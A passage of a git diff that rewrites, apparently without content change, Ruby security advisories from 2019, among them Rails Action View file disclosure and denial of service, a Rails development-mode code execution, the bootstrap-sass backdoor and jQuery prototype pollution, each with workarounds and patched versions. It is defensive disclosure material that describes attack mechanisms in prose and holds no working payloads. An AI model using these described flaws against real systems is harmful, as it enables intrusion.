+    could inject arbitrary code to the stub line of gemspec, which is eval-ed by
+    code in ensure_loadable_spec during the preinstall check.
+  cvss_v3: 8.8
+  unaffected_versions:
+  - "< 2.6"
+  patched_versions:
+  - ">= 3.0.3"
+  - "~> 2.7.9"
+---
diff --git a/advisories/_posts/2019-03-05-CVE-2019-8325.md b/advisories/_posts/2019-03-05-CVE-2019-8325.md
index 820f094d..390fcd23 100644
--- a/advisories/_posts/2019-03-05-CVE-2019-8325.md
+++ b/advisories/_posts/2019-03-05-CVE-2019-8325.md
@@ -1,27 +1,27 @@
----
-layout: advisory
-title: 'CVE-2019-8325 (rubygems-update): Escape sequence injection vulnerability in
-  errors'
-comments: false
-categories:
-- rubygems-update
-- rubygems
-advisory:
-  gem: rubygems-update
-  library: rubygems
-  cve: 2019-8325
-  ghsa: 4wm8-fjv7-j774
-  url: https://blog.rubygems.org/2019/03/05/security-advisories-2019-03.html
-  title: Escape sequence injection vulnerability in errors
-  date: 2019-03-05
-  description: |
-    An issue was discovered in RubyGems 2.6 and later through 3.0.2. Since
-    Gem::CommandManager#run calls alert_error without escaping, escape sequence
-    injection is possible. (There are many ways to cause an error.)
-  cvss_v3: 7.5
-  unaffected_versions:
-  - "< 2.6"
-  patched_versions:
-  - ">= 3.0.3"
-  - "~> 2.7.9"
----
+---
+layout: advisory
+title: 'CVE-2019-8325 (rubygems-update): Escape sequence injection vulnerability in
+  errors'
+comments: false
+categories:
+- rubygems-update
+- rubygems
+advisory:
+  gem: rubygems-update
+  library: rubygems
+  cve: 2019-8325
+  ghsa: 4wm8-fjv7-j774
+  url: https://blog.rubygems.org/2019/03/05/security-advisories-2019-03.html
+  title: Escape sequence injection vulnerability in errors
+  date: 2019-03-05
+  description: |
+    An issue was discovered in RubyGems 2.6 and later through 3.0.2. Since
+    Gem::CommandManager#run calls alert_error without escaping, escape sequence
+    injection is possible. (There are many ways to cause an error.)
+  cvss_v3: 7.5
+  unaffected_versions:
+  - "< 2.6"
+  patched_versions:
+  - ">= 3.0.3"
+  - "~> 2.7.9"
+---
diff --git a/advisories/_posts/2019-03-08-CVE-2018-6517.md b/advisories/_posts/2019-03-08-CVE-2018-6517.md
index ad5a7f7f..54e68ad5 100644
--- a/advisories/_posts/2019-03-08-CVE-2018-6517.md
+++ b/advisories/_posts/2019-03-08-CVE-2018-6517.md
@@ -1,22 +1,22 @@
----
-layout: advisory
-title: 'CVE-2018-6517 (chloride): Improper handling of ssh known_hosts file with Chloride'
-comments: false
-categories:
-- chloride
-advisory:
-  gem: chloride
-  cve: 2018-6517
-  ghsa: 573x-jhqh-jg36
-  url: https://puppet.com/security/cve/CVE-2018-6517
-  title: Improper handling of ssh known_hosts file with Chloride
-  date: 2019-03-08
-  description: |
-    Prior to version 0.3.0, chloride's use of net-ssh resulted in host fingerprints
-    for previously unknown hosts getting added to the user's known_hosts file without
-    confirmation. In version 0.3.0 this is updated so that the user's known_hosts file
-    is not updated by chloride.
-  cvss_v3: 5.0
-  patched_versions:
-  - ">= 0.3.0"
----
+---
+layout: advisory
+title: 'CVE-2018-6517 (chloride): Improper handling of ssh known_hosts file with Chloride'
+comments: false
+categories:
+- chloride
+advisory:
+  gem: chloride
+  cve: 2018-6517
+  ghsa: 573x-jhqh-jg36
+  url: https://puppet.com/security/cve/CVE-2018-6517
+  title: Improper handling of ssh known_hosts file with Chloride
+  date: 2019-03-08
+  description: |
+    Prior to version 0.3.0, chloride's use of net-ssh resulted in host fingerprints
+    for previously unknown hosts getting added to the user's known_hosts file without
+    confirmation. In version 0.3.0 this is updated so that the user's known_hosts file
+    is not updated by chloride.
+  cvss_v3: 5.0
+  patched_versions:
+  - ">= 0.3.0"
+---
diff --git a/advisories/_posts/2019-03-13-CVE-2019-5418.md b/advisories/_posts/2019-03-13-CVE-2019-5418.md
index c4b8aedf..5f248da0 100644
--- a/advisories/_posts/2019-03-13-CVE-2019-5418.md
+++ b/advisories/_posts/2019-03-13-CVE-2019-5418.md
@@ -1,105 +1,105 @@
----
-layout: advisory
-title: 'CVE-2019-5418 (actionview): File Content Disclosure in Action View'
-comments: false
-categories:
-- actionview
-- rails
-advisory:
-  gem: actionview
-  framework: rails
-  cve: 2019-5418
-  ghsa: 86g5-2wh3-gc9j
-  url: https://groups.google.com/forum/#!topic/rubyonrails-security/pFRKI96Sm8Q
-  title: File Content Disclosure in Action View
-  date: 2019-03-13
-  description: |
-    There is a possible file content disclosure vulnerability in Action View. This
-    vulnerability has been assigned the CVE identifier CVE-2019-5418.
-
-    Versions Affected:  All.
-    Not affected:       None.
-    Fixed Versions:     6.0.0.beta3, 5.2.2.1, 5.1.6.2, 5.0.7.2, 4.2.11.1
-
-    Impact
-    ------
-    There is a possible file content disclosure vulnerability in Action View.
-    Specially crafted accept headers in combination with calls to `render file:`
-    can cause arbitrary files on the target server to be rendered, disclosing the
-    file contents.
-
-    The impact is limited to calls to `render` which render file contents without
-    a specified accept format.  Impacted code in a controller looks something like
-    this:
-
-    ```
-    class UserController < ApplicationController
-      def index
-        render file: "#{Rails.root}/some/file"
-      end
-    end
-    ```
-
-    Rendering templates as opposed to files is not impacted by this vulnerability.
-
-    All users running an affected release should either upgrade or use one of the
-    workarounds immediately.
-
-    Releases
-    --------
-    The 6.0.0.beta3, 5.2.2.1, 5.1.6.2, 5.0.7.2, and 4.2.11.1 releases are
-    available at the normal locations.
-
-    Workarounds
-    -----------
-    This vulnerability can be mitigated by specifying a format for file rendering,
-    like this:
-
-    ```
-    class UserController < ApplicationController
-      def index
-        render file: "#{Rails.root}/some/file", formats: [:html]
-      end
-    end
-    ```
-
-    In summary, impacted calls to `render` look like this:
-
-    ```
-    render file: "#{Rails.root}/some/file"
-    ```
-
-    The vulnerability can be mitigated by changing to this:
-
-    ```
-    render file: "#{Rails.root}/some/file", formats: [:html]
-    ```
-
-    Other calls to `render` are not impacted.
-
-    Alternatively, the following monkey patch can be applied in an initializer:
-
-    ```
-    $ cat config/initializers/formats_filter.rb
-    # frozen_string_literal: true
-
-    ActionDispatch::Request.prepend(Module.new do
-      def formats
-        super().select do |format|
-          format.symbol || format.ref == "*/*"
-        end
-      end
-    end)
-    ```
-
-    Credits
-    -------
-    Thanks to John Hawthorn <john@hawthorn.email> of GitHub
-  cvss_v3: 7.5
-  patched_versions:
-  - "~> 4.2.11, >= 4.2.11.1"
-  - "~> 5.0.7, >= 5.0.7.2"
-  - "~> 5.1.6, >= 5.1.6.2"
-  - "~> 5.2.2, >= 5.2.2.1"
-  - ">= 6.0.0.beta3"
----
+---
+layout: advisory
+title: 'CVE-2019-5418 (actionview): File Content Disclosure in Action View'
+comments: false
+categories:
+- actionview
+- rails
+advisory:
+  gem: actionview
+  framework: rails
+  cve: 2019-5418
+  ghsa: 86g5-2wh3-gc9j
+  url: https://groups.google.com/forum/#!topic/rubyonrails-security/pFRKI96Sm8Q
+  title: File Content Disclosure in Action View
+  date: 2019-03-13
+  description: |
+    There is a possible file content disclosure vulnerability in Action View. This
+    vulnerability has been assigned the CVE identifier CVE-2019-5418.
+
+    Versions Affected:  All.
+    Not affected:       None.
+    Fixed Versions:     6.0.0.beta3, 5.2.2.1, 5.1.6.2, 5.0.7.2, 4.2.11.1
+
+    Impact
+    ------
+    There is a possible file content disclosure vulnerability in Action View.
+    Specially crafted accept headers in combination with calls to `render file:`
+    can cause arbitrary files on the target server to be rendered, disclosing the
+    file contents.
+
+    The impact is limited to calls to `render` which render file contents without
+    a specified accept format.  Impacted code in a controller looks something like
+    this:
+
+    ```
+    class UserController < ApplicationController
+      def index
+        render file: "#{Rails.root}/some/file"
+      end
+    end
+    ```
+
+    Rendering templates as opposed to files is not impacted by this vulnerability.
+
+    All users running an affected release should either upgrade or use one of the
+    workarounds immediately.
+
+    Releases
+    --------
+    The 6.0.0.beta3, 5.2.2.1, 5.1.6.2, 5.0.7.2, and 4.2.11.1 releases are
+    available at the normal locations.
+
+    Workarounds
+    -----------
+    This vulnerability can be mitigated by specifying a format for file rendering,
+    like this:
+
+    ```
+    class UserController < ApplicationController
+      def index
+        render file: "#{Rails.root}/some/file", formats: [:html]
+      end
+    end
+    ```
+
+    In summary, impacted calls to `render` look like this:
+
+    ```
+    render file: "#{Rails.root}/some/file"
+    ```
+
+    The vulnerability can be mitigated by changing to this:
+
+    ```
+    render file: "#{Rails.root}/some/file", formats: [:html]
+    ```
+
+    Other calls to `render` are not impacted.
+
+    Alternatively, the following monkey patch can be applied in an initializer:
+
+    ```
+    $ cat config/initializers/formats_filter.rb
+    # frozen_string_literal: true
+
+    ActionDispatch::Request.prepend(Module.new do
+      def formats
+        super().select do |format|
+          format.symbol || format.ref == "*/*"
+        end
+      end
+    end)
+    ```
+
+    Credits
+    -------
+    Thanks to John Hawthorn <john@hawthorn.email> of GitHub
+  cvss_v3: 7.5
+  patched_versions:
+  - "~> 4.2.11, >= 4.2.11.1"
+  - "~> 5.0.7, >= 5.0.7.2"
+  - "~> 5.1.6, >= 5.1.6.2"
+  - "~> 5.2.2, >= 5.2.2.1"
+  - ">= 6.0.0.beta3"
+---
diff --git a/advisories/_posts/2019-03-13-CVE-2019-5419.md b/advisories/_posts/2019-03-13-CVE-2019-5419.md
index ef34c9e0..6d38294c 100644
--- a/advisories/_posts/2019-03-13-CVE-2019-5419.md
+++ b/advisories/_posts/2019-03-13-CVE-2019-5419.md
@@ -1,101 +1,101 @@
----
-layout: advisory
-title: 'CVE-2019-5419 (actionview): Denial of Service Vulnerability in Action View'
-comments: false
-categories:
-- actionview
-- rails
-advisory:
-  gem: actionview
-  framework: rails
-  cve: 2019-5419
-  ghsa: m63j-wh5w-c252
-  url: https://groups.google.com/forum/#!topic/rubyonrails-security/GN7w9fFAQeI
-  title: Denial of Service Vulnerability in Action View
-  date: 2019-03-13
-  description: |
-    There is a potential denial of service vulnerability in actionview.
-    This vulnerability has been assigned the CVE identifier CVE-2019-5419.
-
-    Impact
-    ------
-    Specially crafted accept headers can cause the Action View template location
-    code to consume 100% CPU, causing the server unable to process requests.  This
-    impacts all Rails applications that render views.
-
-    All users running an affected release should either upgrade or use one of the
-    workarounds immediately.
-
-    Workarounds
-    -----------
-    This vulnerability can be mitigated by wrapping `render` calls with
-    `respond_to` blocks.  For example, the following example is vulnerable:
-
-    ```
-    class UserController < ApplicationController
-      def index
-        render "index"
-      end
-    end
-    ```
-
-    But the following code is not vulnerable:
-
-    ```
-    class UserController < ApplicationController
-      def index
-        respond_to |format|
-          format.html { render "index" }
-        end
-      end
-    end
-    ```
-
-    Implicit rendering is impacted, so this code is vulnerable:
-
-    ```
-    class UserController < ApplicationController
-      def index
-      end
-    end
-    ```
-
-    But can be changed this this:
-
-    ```
-    class UserController < ApplicationController
-      def index
-        respond_to |format|
-          format.html { render "index" }
-        end
-      end
-    end
-    ```
-
-    Alternatively to specifying the format, the following monkey patch can be
-    applied in an initializer:
-
-    ```
-    $ cat config/initializers/formats_filter.rb
-    # frozen_string_literal: true
-
-    ActionDispatch::Request.prepend(Module.new do
-      def formats
-        super().select do |format|
-          format.symbol || format.ref == "*/*"
-        end
-      end
-    end)
-    ```
-
-    Credits
-    -------
-    Thanks to John Hawthorn <john@hawthorn.email> of GitHub
-  cvss_v3: 7.5
-  patched_versions:
-  - ">= 6.0.0.beta3"
-  - "~> 5.2.2, >= 5.2.2.1"
-  - "~> 5.1.6, >= 5.1.6.2"
-  - "~> 5.0.7, >= 5.0.7.2"
-  - "~> 4.2.11, >= 4.2.11.1"
----
+---
+layout: advisory
+title: 'CVE-2019-5419 (actionview): Denial of Service Vulnerability in Action View'
+comments: false
+categories:
+- actionview
+- rails
+advisory:
+  gem: actionview
+  framework: rails
+  cve: 2019-5419
+  ghsa: m63j-wh5w-c252
+  url: https://groups.google.com/forum/#!topic/rubyonrails-security/GN7w9fFAQeI
+  title: Denial of Service Vulnerability in Action View
+  date: 2019-03-13
+  description: |
+    There is a potential denial of service vulnerability in actionview.
+    This vulnerability has been assigned the CVE identifier CVE-2019-5419.
+
+    Impact
+    ------
+    Specially crafted accept headers can cause the Action View template location
+    code to consume 100% CPU, causing the server unable to process requests.  This
+    impacts all Rails applications that render views.
+
+    All users running an affected release should either upgrade or use one of the
+    workarounds immediately.
+
+    Workarounds
+    -----------
+    This vulnerability can be mitigated by wrapping `render` calls with
+    `respond_to` blocks.  For example, the following example is vulnerable:
+
+    ```
+    class UserController < ApplicationController
+      def index
+        render "index"
+      end
+    end
+    ```
+
+    But the following code is not vulnerable:
+
+    ```
+    class UserController < ApplicationController
+      def index
+        respond_to |format|
+          format.html { render "index" }
+        end
+      end
+    end
+    ```
+
+    Implicit rendering is impacted, so this code is vulnerable:
+
+    ```
+    class UserController < ApplicationController
+      def index
+      end
+    end
+    ```
+
+    But can be changed this this:
+
+    ```
+    class UserController < ApplicationController
+      def index
+        respond_to |format|
+          format.html { render "index" }
+        end
+      end
+    end
+    ```
+
+    Alternatively to specifying the format, the following monkey patch can be
+    applied in an initializer:
+
+    ```
+    $ cat config/initializers/formats_filter.rb
+    # frozen_string_literal: true
+
+    ActionDispatch::Request.prepend(Module.new do
+      def formats
+        super().select do |format|
+          format.symbol || format.ref == "*/*"
+        end
+      end
+    end)
+    ```
+
+    Credits
+    -------
+    Thanks to John Hawthorn <john@hawthorn.email> of GitHub
+  cvss_v3: 7.5
+  patched_versions:
+  - ">= 6.0.0.beta3"
+  - "~> 5.2.2, >= 5.2.2.1"
+  - "~> 5.1.6, >= 5.1.6.2"
+  - "~> 5.0.7, >= 5.0.7.2"
+  - "~> 4.2.11, >= 4.2.11.1"
+---
diff --git a/advisories/_posts/2019-03-13-CVE-2019-5420.md b/advisories/_posts/2019-03-13-CVE-2019-5420.md
index c7a4e74e..9952ee5a 100644
--- a/advisories/_posts/2019-03-13-CVE-2019-5420.md
+++ b/advisories/_posts/2019-03-13-CVE-2019-5420.md
@@ -1,56 +1,56 @@
----
-layout: advisory
-title: 'CVE-2019-5420 (railties): Possible Remote Code Execution Exploit in Rails
-  Development Mode'
-comments: false
-categories:
-- railties
-- rails
-advisory:
-  gem: railties
-  framework: rails
-  cve: 2019-5420
-  ghsa: m42h-mh85-4qgc
-  url: https://groups.google.com/forum/#!topic/rubyonrails-security/IsQKvDqZdKw
-  title: Possible Remote Code Execution Exploit in Rails Development Mode
-  date: 2019-03-13
-  description: |
-    There is a possible a possible remote code executing exploit in Rails when in
-    development mode. This vulnerability has been assigned the CVE identifier
-    CVE-2019-5420.
-
-    Versions Affected:  6.0.0.X, 5.2.X.
-    Not affected:       < 5.2.0
-    Fixed Versions:     6.0.0.beta3, 5.2.2.1
-
-    Impact
-    ------
-    With some knowledge of a target application it is possible for an attacker to
-    guess the automatically generated development mode secret token.  This secret
-    token can be used in combination with other Rails internals to escalate to a
-    remote code execution exploit.
-
-    All users running an affected release should either upgrade or use one of the
-    workarounds immediately.
-
-    Releases
-    --------
-    The 6.0.0.beta3 and 5.2.2.1 releases are available at the normal locations.
-
-    Workarounds
-    -----------
-    This issue can be mitigated by specifying a secret key in development mode.
-    In "config/environments/development.rb" add this:
-
-      config.secret_key_base = SecureRandom.hex(64)
-
-    Credits
-    -------
-    Thanks to ooooooo_q
-  cvss_v3: 9.8
-  unaffected_versions:
-  - "< 5.2.0"
-  patched_versions:
-  - "~> 5.2.2, >= 5.2.2.1"
-  - ">= 6.0.0.beta3"
----
+---
+layout: advisory
+title: 'CVE-2019-5420 (railties): Possible Remote Code Execution Exploit in Rails
+  Development Mode'
+comments: false
+categories:
+- railties
+- rails
+advisory:
+  gem: railties
+  framework: rails
+  cve: 2019-5420
+  ghsa: m42h-mh85-4qgc
+  url: https://groups.google.com/forum/#!topic/rubyonrails-security/IsQKvDqZdKw
+  title: Possible Remote Code Execution Exploit in Rails Development Mode
+  date: 2019-03-13
+  description: |
+    There is a possible a possible remote code executing exploit in Rails when in
+    development mode. This vulnerability has been assigned the CVE identifier
+    CVE-2019-5420.
+
+    Versions Affected:  6.0.0.X, 5.2.X.
+    Not affected:       < 5.2.0
+    Fixed Versions:     6.0.0.beta3, 5.2.2.1
+
+    Impact
+    ------
+    With some knowledge of a target application it is possible for an attacker to
+    guess the automatically generated development mode secret token.  This secret
+    token can be used in combination with other Rails internals to escalate to a
+    remote code execution exploit.
+
+    All users running an affected release should either upgrade or use one of the
+    workarounds immediately.
+
+    Releases
+    --------
+    The 6.0.0.beta3 and 5.2.2.1 releases are available at the normal locations.
+
+    Workarounds
+    -----------
+    This issue can be mitigated by specifying a secret key in development mode.
+    In "config/environments/development.rb" add this:
+
+      config.secret_key_base = SecureRandom.hex(64)
+
+    Credits
+    -------
+    Thanks to ooooooo_q
+  cvss_v3: 9.8
+  unaffected_versions:
+  - "< 5.2.0"
+  patched_versions:
+  - "~> 5.2.2, >= 5.2.2.1"
+  - ">= 6.0.0.beta3"
+---
diff --git a/advisories/_posts/2019-03-25-CVE-2019-9837.md b/advisories/_posts/2019-03-25-CVE-2019-9837.md
index 24a907fa..c639ec09 100644
--- a/advisories/_posts/2019-03-25-CVE-2019-9837.md
+++ b/advisories/_posts/2019-03-25-CVE-2019-9837.md
@@ -1,26 +1,26 @@
----
-layout: advisory
-title: 'CVE-2019-9837 (doorkeeper-openid_connect): Doorkeeper::OpenidConnect Open
-  Redirect'
-comments: false
-categories:
-- doorkeeper-openid_connect
-advisory:
-  gem: doorkeeper-openid_connect
-  cve: 2019-9837
-  ghsa: vv4c-g6q7-p3q7
-  url: https://github.com/doorkeeper-gem/doorkeeper-openid_connect/blob/master/CHANGELOG.md#v154-2019-02-15
-  title: Doorkeeper::OpenidConnect Open Redirect
-  date: 2019-03-25
-  description: |
-    Doorkeeper::OpenidConnect (aka the OpenID Connect extension for Doorkeeper)
-    1.4.x and 1.5.x before 1.5.4 has an open redirect via the redirect_uri field in
-    an OAuth authorization request (that results in an error response) with the 'openid'
-    scope and a prompt=none value. This allows phishing attacks against the authorization
-    flow.
-  cvss_v3: 6.1
-  unaffected_versions:
-  - "< 1.4.0"
-  patched_versions:
-  - ">= 1.5.4"
----
+---
+layout: advisory
+title: 'CVE-2019-9837 (doorkeeper-openid_connect): Doorkeeper::OpenidConnect Open
+  Redirect'
+comments: false
+categories:
+- doorkeeper-openid_connect
+advisory:
+  gem: doorkeeper-openid_connect
+  cve: 2019-9837
+  ghsa: vv4c-g6q7-p3q7
+  url: https://github.com/doorkeeper-gem/doorkeeper-openid_connect/blob/master/CHANGELOG.md#v154-2019-02-15
+  title: Doorkeeper::OpenidConnect Open Redirect
+  date: 2019-03-25
+  description: |
+    Doorkeeper::OpenidConnect (aka the OpenID Connect extension for Doorkeeper)
+    1.4.x and 1.5.x before 1.5.4 has an open redirect via the redirect_uri field in
+    an OAuth authorization request (that results in an error response) with the 'openid'
+    scope and a prompt=none value. This allows phishing attacks against the authorization
+    flow.
+  cvss_v3: 6.1
+  unaffected_versions:
+  - "< 1.4.0"
+  patched_versions:
+  - ">= 1.5.4"
+---
diff --git a/advisories/_posts/2019-04-04-CVE-2019-10842.md b/advisories/_posts/2019-04-04-CVE-2019-10842.md
index a7d8a18d..8c3efc22 100644
--- a/advisories/_posts/2019-04-04-CVE-2019-10842.md
+++ b/advisories/_posts/2019-04-04-CVE-2019-10842.md
@@ -1,32 +1,32 @@
----
-layout: advisory
-title: 'CVE-2019-10842 (bootstrap-sass): Remote code execution in bootstrap-sass'
-comments: false
-categories:
-- bootstrap-sass
-advisory:
-  gem: bootstrap-sass
-  cve: 2019-10842
-  ghsa: vqqv-v9m2-48p2
-  url: https://github.com/twbs/bootstrap-sass/issues/1195
-  title: Remote code execution in bootstrap-sass
-  date: 2019-04-04
-  description: |
-    Arbitrary code execution (via backdoor code, when
-    downloaded from rubygems.org) was discovered in
-    bootstrap-sass 3.2.0.3.
-
-    Users are advised to upgrade immediately to 3.2.0.4
-
-    An unauthenticated attacker can craft the ___cfduid cookie value
-    with base64 arbitrary code to be executed via eval(), which can
-    be leveraged to execute arbitrary code on the target system.
-    (Note that there are three underscore characters in the cookie name.
-    This is unrelated to the __cfduid cookie that is legitimately used by
-    Cloudflare.)
-  cvss_v3: 9.8
-  unaffected_versions:
-  - "<= 3.2.0.2"
-  patched_versions:
-  - ">= 3.2.0.4"
----
+---
+layout: advisory
+title: 'CVE-2019-10842 (bootstrap-sass): Remote code execution in bootstrap-sass'
+comments: false
+categories:
+- bootstrap-sass
+advisory:
+  gem: bootstrap-sass
+  cve: 2019-10842
+  ghsa: vqqv-v9m2-48p2
+  url: https://github.com/twbs/bootstrap-sass/issues/1195
+  title: Remote code execution in bootstrap-sass
+  date: 2019-04-04
+  description: |
+    Arbitrary code execution (via backdoor code, when
+    downloaded from rubygems.org) was discovered in
+    bootstrap-sass 3.2.0.3.
+
+    Users are advised to upgrade immediately to 3.2.0.4
+
+    An unauthenticated attacker can craft the ___cfduid cookie value
+    with base64 arbitrary code to be executed via eval(), which can
+    be leveraged to execute arbitrary code on the target system.
+    (Note that there are three underscore characters in the cookie name.
+    This is unrelated to the __cfduid cookie that is legitimately used by
+    Cloudflare.)
+  cvss_v3: 9.8
+  unaffected_versions:
+  - "<= 3.2.0.2"
+  patched_versions:
+  - ">= 3.2.0.4"
+---
diff --git a/advisories/_posts/2019-04-10-CVE-2019-16060.md b/advisories/_posts/2019-04-10-CVE-2019-16060.md
index 5d35d99b..a4daff56 100644
--- a/advisories/_posts/2019-04-10-CVE-2019-16060.md
+++ b/advisories/_posts/2019-04-10-CVE-2019-16060.md
@@ -1,28 +1,28 @@
----
-layout: advisory
-title: 'CVE-2019-16060 (airbrake-ruby): Blacklist keys are no longer being filtered
-  in airbrake-ruby'
-comments: false
-categories:
-- airbrake-ruby
-advisory:
-  gem: airbrake-ruby
-  cve: 2019-16060
-  ghsa: 2p82-v77v-mppr
-  url: https://github.com/airbrake/airbrake-ruby/issues/468
-  title: Blacklist keys are no longer being filtered in airbrake-ruby
-  date: 2019-04-10
-  description: |
-    A flaw in airbrake-ruby v4.2.3 prevented user data from being filtered
-    prior to sending to Airbrake. Such data could be user passwords. Therefore, an app
-    could leak user passwords without knowing it.
-  cvss_v3: 9.8
-  unaffected_versions:
-  - "< 4.2.3"
-  - "> 4.2.3"
-  patched_versions:
-  - ">= 4.2.4"
-  related:
-    url:
-    - https://github.com/airbrake/airbrake-ruby/pull/469
----
+---
+layout: advisory
+title: 'CVE-2019-16060 (airbrake-ruby): Blacklist keys are no longer being filtered
+  in airbrake-ruby'
+comments: false
+categories:
+- airbrake-ruby
+advisory:
+  gem: airbrake-ruby
+  cve: 2019-16060
+  ghsa: 2p82-v77v-mppr
+  url: https://github.com/airbrake/airbrake-ruby/issues/468
+  title: Blacklist keys are no longer being filtered in airbrake-ruby
+  date: 2019-04-10
+  description: |
+    A flaw in airbrake-ruby v4.2.3 prevented user data from being filtered
+    prior to sending to Airbrake. Such data could be user passwords. Therefore, an app
+    could leak user passwords without knowing it.
+  cvss_v3: 9.8
+  unaffected_versions:
+  - "< 4.2.3"
+  - "> 4.2.3"
+  patched_versions:
+  - ">= 4.2.4"
+  related:
+    url:
+    - https://github.com/airbrake/airbrake-ruby/pull/469
+---
diff --git a/advisories/_posts/2019-04-19-CVE-2019-11358.md b/advisories/_posts/2019-04-19-CVE-2019-11358.md
index 4dbc9ab0..e2165bd3 100644
--- a/advisories/_posts/2019-04-19-CVE-2019-11358.md
+++ b/advisories/_posts/2019-04-19-CVE-2019-11358.md
@@ -1,30 +1,30 @@
----
-layout: advisory
-title: 'CVE-2019-11358 (jquery-rails): Prototype pollution attack through jQuery $.extend'
-comments: false
-categories:
-- jquery-rails
-- rails
-advisory:
-  gem: jquery-rails
-  framework: rails
-  cve: 2019-11358
-  ghsa: 6c3j-c64m-qhgq
-  url: https://blog.jquery.com/2019/04/10/jquery-3-4-0-released/
-  title: Prototype pollution attack through jQuery $.extend
-  date: 2019-04-19
-  description: |
-    jQuery before 3.4.0 mishandles jQuery.extend(true, {}, ...) because of
-    bject.prototype pollution. If an unsanitized source object contained an
-    enumerable __proto__ property, it could extend the native Object.prototype.
-  cvss_v2: 4.3
-  cvss_v3: 6.1
-  patched_versions:
-  - ">= 4.3.4"
-  related:
-    url:
-    - https://hackerone.com/reports/454365
-    - https://github.com/jquery/jquery/pull/4333
-    - https://github.com/jquery/jquery/commit/753d591aea698e57d6db58c9f722cd0808619b1b
-    - https://github.com/rails/jquery-rails/blob/master/CHANGELOG.md#434
----
+---
+layout: advisory
+title: 'CVE-2019-11358 (jquery-rails): Prototype pollution attack through jQuery $.extend'
+comments: false
+categories:
+- jquery-rails
+- rails
+advisory:
+  gem: jquery-rails
+  framework: rails
+  cve: 2019-11358
+  ghsa: 6c3j-c64m-qhgq
+  url: https://blog.jquery.com/2019/04/10/jquery-3-4-0-released/
+  title: Prototype pollution attack through jQuery $.extend
+  date: 2019-04-19
+  description: |
+    jQuery before 3.4.0 mishandles jQuery.extend(true, {}, ...) because of
+    bject.prototype pollution. If an unsanitized source object contained an
+    enumerable __proto__ property, it could extend the native Object.prototype.
+  cvss_v2: 4.3
+  cvss_v3: 6.1
+  patched_versions:
+  - ">= 4.3.4"
+  related:
+    url:
+    - https://hackerone.com/reports/454365
+    - https://github.com/jquery/jquery/pull/4333
+    - https://github.com/jquery/jquery/commit/753d591aea698e57d6db58c9f722cd0808619b1b
+    - https://github.com/rails/jquery-rails/blob/master/CHANGELOG.md#434
+---
diff --git a/advisories/_posts/2019-04-22-CVE-2019-11068.md b/advisories/_posts/2019-04-22-CVE-2019-11068.md
index 2178b2c3..517ecad7 100644
--- a/advisories/_posts/2019-04-22-CVE-2019-11068.md
+++ b/advisories/_posts/2019-04-22-CVE-2019-11068.md
@@ -1,57 +1,57 @@
----
-layout: advisory
-title: 'CVE-2019-11068 (nokogiri): Nokogiri gem, via libxslt, is affected by improper
-  access control vulnerability'
-comments: false
-categories:
-- nokogiri
-advisory:
-  gem: nokogiri
-  cve: 2019-11068
-  ghsa: qxcg-xjjg-66mj
-  url: https://github.com/sparklemotion/nokogiri/issues/1892
-  title: Nokogiri gem, via libxslt, is affected by improper access control vulnerability
-  date: 2019-04-22
-  description: |
-    Nokogiri v1.10.3 has been released.
-
-    This is a security release. It addresses a CVE in upstream libxslt rated as
-    "Priority: medium" by Canonical, and "NVD Severity: high" by Debian. More
-    details are available below.
-
-    If you're using your distro's system libraries, rather than Nokogiri's
-    vendored libraries, there's no security need to upgrade at this time, though
-    you may want to check with your distro whether they've patched this
-    (Canonical has patched Ubuntu packages). Note that this patch is not yet (as
-    of 2019-04-22) in an upstream release of libxslt.
-
-    Full details about the security update are available in Github Issue
-    [#1892] https://github.com/sparklemotion/nokogiri/issues/1892.
-
-    ---
-
-    CVE-2019-11068
-
-    Permalinks are:
-    - Canonical: https://people.canonical.com/~ubuntu-security/cve/CVE-2019-11068
-    - Debian: https://security-tracker.debian.org/tracker/CVE-2019-11068
-
-    Description:
-
-    > libxslt through 1.1.33 allows bypass of a protection mechanism
-    > because callers of xsltCheckRead and xsltCheckWrite permit access
-    > even upon receiving a -1 error code. xsltCheckRead can return -1 for
-    > a crafted URL that is not actually invalid and is subsequently
-    > loaded.
-
-    Canonical rates this as "Priority: Medium".
-
-    Debian rates this as "NVD Severity: High (attack range: remote)".
-  cvss_v3: 9.8
-  patched_versions:
-  - ">= 1.10.3"
-  related:
-    url:
-    - https://groups.google.com/forum/#!msg/ruby-security-ann/_y80o1zZlOs/k4SDX6hoAAAJ
-    - https://gitlab.gnome.org/GNOME/libxslt/commit/e03553605b45c88f0b4b2980adfbbb8f6fca2fd6
----
+---
+layout: advisory
+title: 'CVE-2019-11068 (nokogiri): Nokogiri gem, via libxslt, is affected by improper
+  access control vulnerability'
+comments: false
+categories:
+- nokogiri
+advisory:
+  gem: nokogiri
+  cve: 2019-11068
+  ghsa: qxcg-xjjg-66mj
+  url: https://github.com/sparklemotion/nokogiri/issues/1892
+  title: Nokogiri gem, via libxslt, is affected by improper access control vulnerability
+  date: 2019-04-22
+  description: |
+    Nokogiri v1.10.3 has been released.
+
+    This is a security release. It addresses a CVE in upstream libxslt rated as
+    "Priority: medium" by Canonical, and "NVD Severity: high" by Debian. More
+    details are available below.
+
+    If you're using your distro's system libraries, rather than Nokogiri's
+    vendored libraries, there's no security need to upgrade at this time, though
+    you may want to check with your distro whether they've patched this
+    (Canonical has patched Ubuntu packages). Note that this patch is not yet (as
+    of 2019-04-22) in an upstream release of libxslt.
+
+    Full details about the security update are available in Github Issue
+    [#1892] https://github.com/sparklemotion/nokogiri/issues/1892.
+
+    ---
+
+    CVE-2019-11068
+
+    Permalinks are:
+    - Canonical: https://people.canonical.com/~ubuntu-security/cve/CVE-2019-11068
+    - Debian: https://security-tracker.debian.org/tracker/CVE-2019-11068
+
+    Description:
+
+    > libxslt through 1.1.33 allows bypass of a protection mechanism
+    > because callers of xsltCheckRead and xsltCheckWrite permit access
+    > even upon receiving a -1 error code. xsltCheckRead can return -1 for
+    > a crafted URL that is not actually invalid and is subsequently
+    > loaded.
+
+    Canonical rates this as "Priority: Medium".
+
+    Debian rates this as "NVD Severity: High (attack range: remote)".
+  cvss_v3: 9.8
+  patched_versions:
+  - ">= 1.10.3"
+  related:
+    url:
+    - https://groups.google.com/forum/#!msg/ruby-security-ann/_y80o1zZlOs/k4SDX6hoAAAJ
+    - https://gitlab.gnome.org/GNOME/libxslt/commit/e03553605b45c88f0b4b2980adfbbb8f6fca2fd6
+---
diff --git a/advisories/_posts/2019-06-04-CVE-2019-12732.md b/advisories/_posts/2019-06-04-CVE-2019-12732.md
index 471c7381..e20251f9 100644
--- a/advisories/_posts/2019-06-04-CVE-2019-12732.md
+++ b/advisories/_posts/2019-06-04-CVE-2019-12732.md
@@ -1,30 +1,30 @@
----
